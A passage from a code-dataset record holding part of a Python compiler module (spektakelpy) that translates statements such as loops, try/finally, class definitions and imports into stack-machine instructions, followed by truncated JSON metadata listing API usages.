body.append_pop()\n\n exitBlock.append_pop()\n\n # TODO (later): The function definition might be nested in another one.\n # Since it might \"escape\" the enclosing function, the variables that are shared between\n # the functions cannot be allocated on the stack.\n # Those variables that are shared must be allocated in a \"Heap frame\", the pointer to which\n # is part of the Function object that is constructed (IT CANNOT BE PASSED AS AN ARGUMENT!\n # REASON: The function object is not being called here, but later,\n # by some other code that receives the function object!)\n # The compilation of the inner function\n # must thus map the shared variables to offsets in the heap frame.\n # --> For now we should just *detect* nonlocal variables and raise a NotImplementedError\n\n f = terms.NewProcedure(num_args, body.compile())\n\n self._blocks.pop()\n\n if name is None:\n return f, chain\n else:\n name = self.declare_pattern(chain, name, on_error)\n chain = chain.append_update(name, f, on_error)\n return name, chain\n\n def translate_statement(self, chain, node, dec, on_error):\n \"\"\"\n Translates a statement into a StackProgram.\n :param chain: The chain to which to append the translation of the statement.\n :param node: An AST node representing a Statement.\n :param dec: A dict mapping AST nodes to decorations.\n :param on_error: The chain to jump to in case an (unhandled) error occurs during the execution of the translated\n statement.\n :return: A Chain object that the instructions resulting from the translation of the statement will jump to\n after completing the execution of the statement.\n \"\"\"\n\n if isinstance(node, Pass):\n pass\n elif isinstance(node, ExpressionStatement):\n _, chain = self.translate_expression(chain, node.expression, dec, on_error)\n # The previous line generated code for any side effects of the expression.\n # We do not really need to use the expression itself,\n # because its evaluation result is not to be bound to anything.\n return chain\n elif isinstance(node, Assignment):\n chain = self.emit_assignment(chain, node.target, dec, node.value, on_error)\n return chain\n elif isinstance(node, Block):\n for s in node.children:\n chain = self.translate_statement(chain, s, dec, on_error)\n return chain\n elif isinstance(node, Return):\n if node.value is not None:\n r, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ReturnValueReference(), r, on_error)\n self.emit_return(on_error, chain)\n return Chain()\n elif isinstance(node, Raise):\n if node.value is None:\n found = False\n # Walk over the block stack (\"outwards\") to find the exception block this re-raise is contained in.\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.Read(entry.exceptionVariable), on_error=on_error)\n found = True\n if not found:\n raise AssertionError(\n \"A raise statement without an expression should not occur outside a try block!\")\n else:\n e, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ExceptionReference(), e, on_error)\n chain.append_jump(on_error)\n return Chain()\n elif isinstance(node, Break):\n self.emit_break(on_error, chain)\n return Chain()\n elif isinstance(node, Continue):\n self.emit_continue(on_error, chain)\n return Chain()\n elif isinstance(node, Conditional):\n consequence = Chain()\n alternative = Chain()\n successor = Chain()\n condition, chain = self.translate_expression(chain, node.condition, dec, on_error)\n chain.append_guard({condition: consequence, ~condition: alternative}, on_error)\n consequence = self.translate_statement(consequence, node.consequence, dec, on_error)\n consequence.append_jump(successor)\n alternative = self.translate_statement(alternative, node.consequence, dec, on_error)\n alternative.append_jump(successor)\n return successor\n elif isinstance(node, While):\n head = Chain()\n body = Chain()\n successor = Chain()\n chain.append_jump(head)\n condition, head = self.translate_expression(head, node.condition, dec, on_error)\n head.append_guard({condition: body, ~condition: successor}, on_error)\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n body = self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(head)\n return successor\n elif isinstance(node, For):\n \"\"\"\n A for loop is syntactic sugar for:\n it = xs.__iter__()\n while True:\n try:\n pattern = it.__next__()\n except StopIteration:\n break\n \n \"\"\"\n\n stopper = Chain()\n body = Chain()\n successor = Chain()\n\n iterable, chain = self.translate_expression(chain, node.iterable, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(iterable, \"__iter__\"), dec, on_error)\n iterator, chain = self.emit_call(chain, callee, [], on_error)\n\n self.declare_pattern(chain, node.pattern, on_error)\n\n chain.append_jump(body)\n\n callee, body = self.translate_expression(body, Attribute(iterator, \"__next__\"), dec, on_error)\n element, body = self.emit_call(body, callee, [], stopper)\n\n s = terms.IsInstance(terms.Read(ExceptionReference()), TStopIteration.instance)\n stopper.append_guard({s: successor, ~s: on_error}, on_error)\n successor.append_update(ExceptionReference(), terms.CNone(), on_error)\n\n head = self.emit_assignment(chain, node.pattern, dec, element, on_error)\n\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(body)\n return successor\n elif isinstance(node, Try):\n\n body = Chain()\n handler = Chain()\n restoration = Chain()\n finally_head = Chain()\n successor = Chain()\n exception = self.declare_name(body, None, on_error)\n self._blocks.push(BlockStack.ExceptionBlock(exception, finally_head))\n self.translate_statement(body, node.body, dec, handler)\n body.append_jump(finally_head)\n\n # As the very first step, the exception variable of the task is cleared:\n handler.append_update(exception, terms.Read(ExceptionReference()), on_error)\n handler.append_update(ExceptionReference(), terms.CNone(), on_error)\n\n for h in node.handlers:\n sc = Chain()\n hc = Chain()\n handler, t = self.translate_expression(handler, h.type, dec, finally_head)\n match = terms.IsInstance(exception, t)\n handler.append_guard({match: hc, ~match: sc}, finally_head)\n\n self._decl2ref[h] = exception\n hc = self.translate_statement(hc, h.body, dec, finally_head)\n hc.append_jump(finally_head)\n\n handler = sc\n\n # If none of the handlers apply, restore the exception variable and jump to the finally:\n handler.append_jump(restoration)\n\n restoration.append_update(ExceptionReference(), terms.Read(exception), on_error)\n restoration.append_update(exception, terms.CNone(), on_error)\n restoration.append_jump(finally_head)\n\n self._blocks.pop()\n\n if node.final is not None:\n # The finally clause first stashes the current exception and return value away:\n returnvalue = self.declare_name(finally_head, None, on_error)\n finally_head.append_update(exception, terms.Read(ExceptionReference()), on_error)\n finally_head.append_update(ExceptionReference(), terms.CNone(), on_error)\n finally_head.append_update(returnvalue, terms.Read(ReturnValueReference()), on_error)\n finally_head.append_update(ReturnValueReference(), terms.CNone(), on_error)\n # Then it executes its body:\n finally_foot = self.translate_statement(finally_head, node.final, dec, on_error)\n # Then it restores the stashed exception and return value:\n finally_foot.append_update(ReturnValueReference(), terms.Read(returnvalue), on_error)\n finally_foot.append_update(ExceptionReference(), terms.Read(exception), on_error)\n finally_foot.append_update(returnvalue, terms.CNone(), on_error)\n else:\n finally_foot = finally_head\n\n # Then it decides where to jump to, depending on the exception that caused the finally to be entered:\n e = terms.Read(ExceptionReference())\n condition_return = terms.IsInstance(e, types.TReturnException())\n condition_break = terms.IsInstance(e, types.TBreakException())\n condition_continue = terms.IsInstance(e, types.TContinueException())\n\n condition_exception = terms.IsInstance(e, types.TException()) & ~condition_break & ~condition_continue & ~condition_return\n condition_termination = terms.Comparison(ComparisonOperator.IS, e, terms.CNone)\n finally_foot.append_guard({condition_termination: successor,\n condition_return: self.emit_return(on_error),\n condition_break: self.emit_break(on_error),\n condition_continue: self.emit_continue(on_error),\n condition_exception: on_error,\n }, on_error)\n\n return successor\n elif isinstance(node, VariableDeclaration):\n self.declare_pattern(chain, node.pattern, on_error)\n if node.expression is not None:\n chain = self.emit_assignment(chain, node.pattern, dec, node.expression, on_error, declaring=True)\n return chain\n elif isinstance(node, ProcedureDefinition):\n if not isinstance(self._blocks[-1], (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n raise NotImplementedError(\"Code generation for procedure definitions on levels other than module level \"\n \"or class level has not been implemented yet!\")\n\n _, chain = self._emit_procedure(chain, node.name, node.argnames, node.body, dec, on_error)\n return chain\n\n elif isinstance(node, PropertyDefinition):\n\n getter, chain = self._emit_procedure(chain, None, [\"self\"], node.getter, dec, on_error)\n setter, chain = self._emit_procedure(chain, None, [\"self\", node.vname], node.setter, dec, on_error)\n\n # A property is a special kind of descriptor (see https://docs.python.org/3/glossary.html#term-descriptor).\n # A property object does not have private data. It only holds the getter and the setter. Both those\n # methods take an instance as argument and then read/write that.\n\n name = self.declare_pattern(chain, node.name, on_error)\n chain = chain.append_update(name, terms.NewProperty(getter, setter), on_error)\n return name, chain\n\n elif isinstance(node, ClassDefinition):\n if not isinstance(self._blocks[-1], BlockStack.ModuleBlock):\n # This would be probelamtic, because the type might incorporate local variables from the current function\n # stack. This is difficult to implement for the same reason that nested function declarations are.\n raise NotImplementedError(\"Code generation for class definitions on levels other than module level \"\n \"has not been implemented yet!\")\n\n self._blocks.push(BlockStack.ClassBlock(0))\n\n name = self.declare_pattern(chain, node.name, on_error)\n\n super_classes = []\n for s_expression in node.bases:\n s_term = self.translate_expression(chain, s_expression, dec, on_error)\n super_classes.append(s_term)\n\n # We create a new Namespace object and put it into the stack frame.\n chain = chain.append_push()\n chain = chain.append_update(FrameReference(0), terms.NewNamespace(), exit)\n\n chain = self.translate_statement(chain, node.body, dec, on_error)\n\n chain = chain.append_update(name, terms.NewClass(super_classes, terms.Read(FrameReference(0))), on_error)\n chain = chain.append_pop()\n\n self._blocks.pop()\n\n return chain\n\n elif isinstance(node, (ImportNames, ImportSource)):\n\n ms = check_type(dec[node.source], ModuleSpecification)\n subnames = list(map(str, node.source.identifiers[1:]))\n\n if isinstance(node, ImportSource):\n mapping = {}\n if node.alias is None:\n if not (len(node.source.Identifiers) == 1):\n raise NotImplementedError(\"Code generation for a source import that contains dots has not been implemented!\")\n name = node.source.Identifiers[0]\n else:\n name = node.alias\n elif isinstance(node, ImportNames):\n if node.wildcard:\n raise NotImplementedError(\"Compilation of wildcard imports has not been implemented!\")\n mapping = {alias.name: name.name for name, alias in node.aliases.items()}\n name = None\n else:\n raise NotImplementedError(\"Code generation for nodes of type {}\"\n \" has not been implemented!\".format(type(node)))\n\n return self.emit_import(chain, ms, subnames, name, mapping, on_error)\n else:\n raise NotImplementedError()\n\n def emit_preamble(self):\n \"\"\"\n Emits code that is to run once at the beginning of execution.\n :return: A Chain object.\n \"\"\"\n\n \"\"\" We generate code for this:\n \n var mcv = {}\n\n def ___import___(location):\n try:\n return mcv[location]\n except KeyError:\n m = ___call___(location, [Module()])\n mcv[location] = m\n return m\n \n del mcv\n \"\"\"\n\n preamble = Chain()\n panic = Chain()\n\n d = self.declare_name(preamble, None, panic)\n d = AbsoluteFrameReference(0, 0, d.index)\n preamble.append_update(TRef(d), NewDict(), panic)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n imp_code = Chain()\n load1 = Chain()\n load2 = Chain()\n exit = Chain()\n l = self.declare_name(imp_code, None, panic)\n imp_code.append_push(CTerm(VDict.get), [Read(TRef(d)), Read(TRef(l))], load1)\n imp_code.append_pop()\n load1.append_push(Read(TRef(l)), [], exit)\n error = terms.Comparison(ComparisonOperator.NEQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n load1.append_guard({error: exit, negate(error): load2}, panic)\n load2.append_push(CTerm(VDict.set), [Read(TRef(d)), Read(TRef(l)), Read(TRef(ReturnValueReference()))], panic)\n load2.append_jump(exit)\n exit.append_pop()\n self._blocks.pop()\n\n self._import_procedure = VProcedure(1, imp_code.compile())\n\n return preamble\n\n def translate_module(self, nodes, dec):\n \"\"\"\n Generates code for an entire module.\n :param nodes: An iterable of statements that represent the code of the module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n\n # We assume that somebody put a fresh frame on the stack.\n\n block = Chain()\n entry = block\n exit = Chain()\n\n # We create a new Namespace object and put it into the stack frame.\n block.append_update(TRef(FrameReference(0)), terms.NewNamespace(), exit)\n\n # The code of a module assumes that there is 1 argument on the current stack frame, which is the Namespace object\n # that is to be populated. All allocations of local variables must actually be members of that Namespace object.\n self._blocks.push(BlockStack.ModuleBlock(0))\n\n # Import the builtin names:\n for bms in self._builtin:\n block = self.emit_import(block, bms, [], None, {s: s for s in bms.symbols}, exit)\n\n # We execute the module code completely, which populates that namespace.\n for node in nodes:\n block = self.translate_statement(block, node, dec, exit)\n\n # Return a Module object. The preamble will store it somewhere.\n block.append_update(TRef(ReturnValueReference()), terms.NewModule(terms.Read(TRef(FrameReference(0)))), exit)\n\n block.append_pop()\n exit.append_pop()\n\n self._blocks.pop()\n\n return entry\n\n def translate(self, nodes, dec):\n \"\"\"\n Translate a standalone program.\n :param nodes: An iterable of statements that represent the code of the main module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n self._blocks.push(BlockStack.ModuleBlock(0))\n code = self.emit_preamble() + self.translate_module(nodes, dec)\n self._blocks.pop()\n return code", "repo_name": "gfhcs/spektakelpy", "sub_path": "lang/spek/dynamic.py", "file_name": "dynamic.py", "file_ext": "py", "file_size_in_byte": 55489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "engine.functional.terms.UnaryOperation", "line_number": 22, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryOperator.NOT", "line_number": 22, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryOperator", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 54, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 58, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 89, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 89, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 120, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 132, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 145, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 145, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 159, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 168, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 183, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 211, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 212, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 221, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 223, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 224, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 226, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 227, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 229, "usage_type": "call"}, {"api_name": "ast.Launch", "line_number": 230, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 232, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 239, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.StackProgram", "line_number": 242, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 250, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 251, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 252, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 253, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 254, "usage_type": "call"}, {"api_name": "lang.translator.Translator", "line_number": 294, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 334, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 336, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 338, "usage_type": "argument"}, {"api_name": "ast.ClassDefinition", "line_number": 340, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 354, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 360, "usage_type": "call"}, {"api_name": "engine.functional.reference.NameReference", "line_number": 361, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 362, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 380, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 395, "usage_type": "argument"}, {"api_name": "ast.AssignableExpression", "line_number": 397, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 423, "usage_type": "argument"}, {"api_name": "engine.functional.terms.TRef", "line_number": 427, "usage_type": "call"}, {"api_name": "ast.Tuple", "line_number": 429, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Project", "line_number": 433, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 433, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 433, "usage_type": "call"}, {"api_name": "ast.Projection", "line_number": 434, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 435, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 438, "usage_type": "argument"}, {"api_name": "engine.functional.terms.StoreAttrCase", "line_number": 466, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 466, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 468, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 468, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 468, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 469, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 469, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 469, "usage_type": "attribute"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 484, "usage_type": "call"}, {"api_name": "ast.AssignableExpression", "line_number": 491, "usage_type": "argument"}, {"api_name": "util.check_type", "line_number": 514, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 514, "usage_type": "argument"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 518, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.ProgramLocation", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 521, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 524, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 527, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.CString", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewTypeError", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 548, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 550, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.NumArgs", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.CInt", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 556, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 560, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 561, "usage_type": "name"}, {"api_name": "ast.Constant", "line_number": 573, "usage_type": "argument"}, {"api_name": "engine.functional.terms.CBool", "line_number": 576, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 576, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 578, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 578, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 580, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 580, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 582, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 582, "usage_type": "name"}, {"api_name": "engine.functional.terms.CFloat", "line_number": 584, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 584, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 588, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 589, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 589, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 590, "usage_type": "argument"}, {"api_name": "engine.functional.terms.LoadAttrCase", "line_number": 594, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 594, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 596, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 596, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 596, "usage_type": "attribute"}, {"api_name": "ast.Call", "line_number": 610, "usage_type": "argument"}, {"api_name": "ast.Launch", "line_number": 618, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 626, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 626, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 626, "usage_type": "call"}, {"api_name": "ast.Await", "line_number": 628, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 631, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 631, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 631, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 635, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 639, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 640, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 640, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 641, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.Projection", "line_number": 643, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 646, "usage_type": "call"}, {"api_name": "ast.UnaryOperation", "line_number": 648, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryOperation", "line_number": 649, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 649, "usage_type": "name"}, {"api_name": "ast.ArithmeticBinaryOperation", "line_number": 650, "usage_type": "argument"}, {"api_name": "engine.functional.terms.ArithmeticBinaryOperation", "line_number": 653, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 653, "usage_type": "name"}, {"api_name": "ast.Comparison", "line_number": 654, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 655, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 655, "usage_type": "name"}, {"api_name": "ast.BooleanBinaryOperation", "line_number": 658, "usage_type": "argument"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.AND", "line_number": 669, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 669, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 670, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 670, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.OR", "line_number": 671, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 671, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 672, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 672, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 674, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 674, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperation", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 679, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 681, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 681, "usage_type": "name"}, {"api_name": "ast.Tuple", "line_number": 682, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewTuple", "line_number": 683, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 683, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.values.VReturnError", "line_number": 701, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 701, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 708, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.values.VBreakError", "line_number": 727, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 727, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 731, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 731, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 731, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.values.VContinueError", "line_number": 752, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 752, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 756, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewProcedure", "line_number": 802, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 802, "usage_type": "name"}, {"api_name": "ast.Pass", "line_number": 825, "usage_type": "argument"}, {"api_name": "ast.ExpressionStatement", "line_number": 827, "usage_type": "argument"}, {"api_name": "ast.Assignment", "line_number": 833, "usage_type": "argument"}, {"api_name": "ast.Block", "line_number": 836, "usage_type": "argument"}, {"api_name": "ast.Return", "line_number": 840, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 843, "usage_type": "call"}, {"api_name": "ast.Raise", "line_number": 846, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 852, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 859, "usage_type": "call"}, {"api_name": "ast.Break", "line_number": 862, "usage_type": "argument"}, {"api_name": "ast.Continue", "line_number": 865, "usage_type": "argument"}, {"api_name": "ast.Conditional", "line_number": 868, "usage_type": "argument"}, {"api_name": "ast.While", "line_number": 879, "usage_type": "argument"}, {"api_name": "ast.For", "line_number": 891, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 908, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 915, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 918, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 920, "usage_type": 